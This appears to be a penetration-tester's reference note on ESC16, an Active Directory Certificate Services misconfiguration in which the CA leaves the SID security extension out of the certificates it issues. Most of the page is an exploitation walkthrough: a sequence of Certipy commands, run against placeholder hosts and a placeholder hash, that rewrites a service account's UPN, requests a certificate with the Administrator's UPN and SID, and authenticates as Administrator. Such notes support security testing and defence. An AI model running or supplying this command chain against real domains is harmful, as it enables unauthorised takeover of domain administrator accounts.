ESC16

ABOUT

ESC16 is a misconfiguration in Active Directory Certificate Services where the CA is globally set—via the DisableExtensionList registry key or due to missing patches—to omit the szOID_NTDS_CA_SECURITY_EXT SID extension from all issued certificates, which breaks strong certificate-to-user mapping and allows attackers, under certain conditions (like DCs set to compatibility mode or combined with ESC6), to spoof UPNs or inject SIDs in SAN fields to impersonate privileged accounts using forged certificates.

ESC6: Lets you inject your own UPN and SID into the SAN (Subject Alternative Name) field of a certificate request.

ESC16: The CA is misconfigured to not include the SID extension (szOID_NTDS_CA_SECURITY_EXT) in certificates.

EXPLOITATION

If you would look into Certipy's docs, there is Scenario A and Scenario B, this is a little bit of both. Updating UPN part is from Scenario A, and requesting certificate with adding our UPN and SID is from Scenario B

Updating UPN

certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -upn 'Administrator' -user 'some_svc' update

Exctracting Admin's SID

certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -upn 'Administrator' -user 'some_svc' read

Requesting valid Admin's cert

certipy req -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -target 'dc01.militech.local' -ca 'militech-DC01-CA' -template 'User' -upn 'administrator@militech.local' -sid 'S-1-5-21-...-500'

Updating back UPN

certipy account -u 'some_svc@militech.local' -hashes wubbalubbadubdub -dc-ip '13.13.13.13' -upn 'some_svc' -user 'some_svc' update       

Authenticating as Admin

certipy auth -pfx 'administrator.pfx' -username 'Administrator' -domain militech.local -dc-ip '13.13.13.13'

RESOURCES

06 ‐ Privilege EscalationGitHub